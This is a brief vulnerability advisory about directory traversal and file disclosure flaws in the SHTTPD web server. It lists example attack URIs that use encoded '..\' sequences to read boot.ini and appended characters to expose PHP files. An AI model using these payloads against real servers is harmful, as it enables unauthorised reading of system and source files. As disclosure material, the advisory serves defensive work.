SHTTPD Multiple File Access And Directory Traversal Vulnerabilities

SHTTPD Multiple File Access And Directory Traversal Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/..\..\..\boot.ini
http://www.example.com/..\%2e%2e%5c..\boot.ini
http://www.example.com/file.php+
http://www.example.com/file.php.
http://www.example.com/file.php%80
http://www.example.com/file.php%ff